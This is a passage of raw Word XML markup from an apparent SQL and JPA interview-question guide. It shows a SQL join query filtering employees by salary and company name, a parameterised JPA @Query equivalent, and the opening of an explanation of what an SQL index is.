          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidR="00185F20" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">uery </w:t>
      </w:r>
      <w:r w:rsidR="00185F20" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>- T</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>o get emp_sal &gt; 5000 and company_name = "Kotak"</w:t>
      </w:r>
      <w:bookmarkEnd w:id="720"/>
    </w:p>
    <w:p w14:paraId="4ACB710B" w14:textId="77777777" w:rsidR="004B1BF8" w:rsidRPr="00CE4B95" w:rsidRDefault="004B1BF8" w:rsidP="004B1BF8">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Table :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BC9B98" w14:textId="77777777" w:rsidR="004B1BF8" w:rsidRPr="00CE4B95" w:rsidRDefault="004B1BF8" w:rsidP="004B1BF8">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>1. Company</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AA1CF0" w14:textId="77777777" w:rsidR="004B1BF8" w:rsidRPr="00CE4B95" w:rsidRDefault="004B1BF8" w:rsidP="004B1BF8">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>- company_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402513CE" w14:textId="77777777" w:rsidR="004B1BF8" w:rsidRPr="00CE4B95" w:rsidRDefault="004B1BF8" w:rsidP="004B1BF8">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>- company_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69759FE6" w14:textId="77777777" w:rsidR="004B1BF8" w:rsidRPr="00CE4B95" w:rsidRDefault="004B1BF8" w:rsidP="004B1BF8">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>2. Employee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60842121" w14:textId="77777777" w:rsidR="004B1BF8" w:rsidRPr="00CE4B95" w:rsidRDefault="004B1BF8" w:rsidP="004B1BF8">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>- emp_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F7E261" w14:textId="77777777" w:rsidR="004B1BF8" w:rsidRPr="00CE4B95" w:rsidRDefault="004B1BF8" w:rsidP="004B1BF8">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>- company_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB47297" w14:textId="77777777" w:rsidR="004B1BF8" w:rsidRPr="00CE4B95" w:rsidRDefault="004B1BF8" w:rsidP="004B1BF8">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>- emp_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D1C82E" w14:textId="249CCC0C" w:rsidR="00E03F39" w:rsidRPr="00CE4B95" w:rsidRDefault="004B1BF8" w:rsidP="004B1BF8">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>- emp_sal</w:t>
      </w:r>
      <w:r w:rsidR="00E03F39" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF95491" w14:textId="6DFAF144" w:rsidR="00E03F39" w:rsidRPr="00CE4B95" w:rsidRDefault="006B6260">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00E03F39" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>nswer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604F8042" w14:textId="795F53AD" w:rsidR="00113106" w:rsidRPr="00CE4B95" w:rsidRDefault="001131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778166"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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emp_sal</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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mpany_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F7839A" w14:textId="70BCF3E9" w:rsidR="00113106" w:rsidRPr="00CE4B95" w:rsidRDefault="001131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778166"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>From</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Employee</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA88D4C" w14:textId="65952BB9" w:rsidR="00113106" w:rsidRPr="00CE4B95" w:rsidRDefault="001131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778166"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>join</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Company</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604184D5" w14:textId="26BB4142" w:rsidR="00113106" w:rsidRPr="00CE4B95" w:rsidRDefault="001131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778166"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>On</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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company_id </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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company_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A038AC7" w14:textId="3955C67A" w:rsidR="00113106" w:rsidRPr="00CE4B95" w:rsidRDefault="001131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778166"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Where </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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emp_sal </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5000</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and</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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company_name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8800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Kotak"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FE7C68" w14:textId="73C63B10"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3892D370">
          <v:rect id="_x0000_i3001" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="272E2B70" w14:textId="0E36A256" w:rsidR="00E03F39" w:rsidRPr="00CE4B95" w:rsidRDefault="0078365A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="721" w:name="_Toc196308201"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Write a JPA query to retrieve the above result</w:t>
      </w:r>
      <w:r w:rsidR="00E03F39" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="721"/>
    </w:p>
    <w:p w14:paraId="0646BA8E" w14:textId="3B3E1361" w:rsidR="00925485" w:rsidRPr="0085313D" w:rsidRDefault="00925485" w:rsidP="00481988">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38B19698" w14:textId="77777777" w:rsidR="00925485" w:rsidRPr="00CE4B95" w:rsidRDefault="009254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30177"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Query</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ELECT e.empSal, c.companyName FROM Employee e JOIN e.company c WHERE e.empSal &gt; :salary AND c.companyName = :companyName"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A69B91" w14:textId="52802658" w:rsidR="00925485" w:rsidRPr="00CE4B95" w:rsidRDefault="009254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30177"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>List</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Object</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findEmployeeSalaryAndCompanyName</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Param</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sala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double</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> salary</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Param</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companyName"</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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> companyName</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A3AD24" w14:textId="7B4B02C8" w:rsidR="0025066D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0025066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928BF99">
          <v:rect id="_x0000_i3002" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="441021D8" w14:textId="7CA7792A" w:rsidR="00E03F39" w:rsidRPr="00CE4B95" w:rsidRDefault="003A1A02">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="722" w:name="_Toc196308202"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is an index in SQL</w:t>
      </w:r>
      <w:r w:rsidR="00E03F39" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="722"/>
    </w:p>
    <w:p w14:paraId="35C241D4" w14:textId="013A6CB6" w:rsidR="00925485" w:rsidRPr="0085313D" w:rsidRDefault="00925485" w:rsidP="0085313D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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An </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>index</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in SQL is a database object used to improve the speed of data retrieval operations on a table. It is a data structure that helps the database engine locate and access rows more efficiently. When a query searches for data in a table, an index helps the database engine to find the rows faster than if it had to scan the entire table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78642BD1" w14:textId="77777777" w:rsidR="00925485" w:rsidRPr="0085313D" w:rsidRDefault="00925485"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Key Points about SQL Index:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F1EDE8" w14:textId="77777777" w:rsidR="00925485" w:rsidRPr="0085313D" w:rsidRDefault="00925485"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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D40B639" w14:textId="77777777" w:rsidR="00925485" w:rsidRPr="0085313D" w:rsidRDefault="00925485"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An index is primarily used to speed up query performance, especially for large tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569B737C" w14:textId="77777777" w:rsidR="00925485" w:rsidRPr="0085313D" w:rsidRDefault="00925485"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It speeds up operations like </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
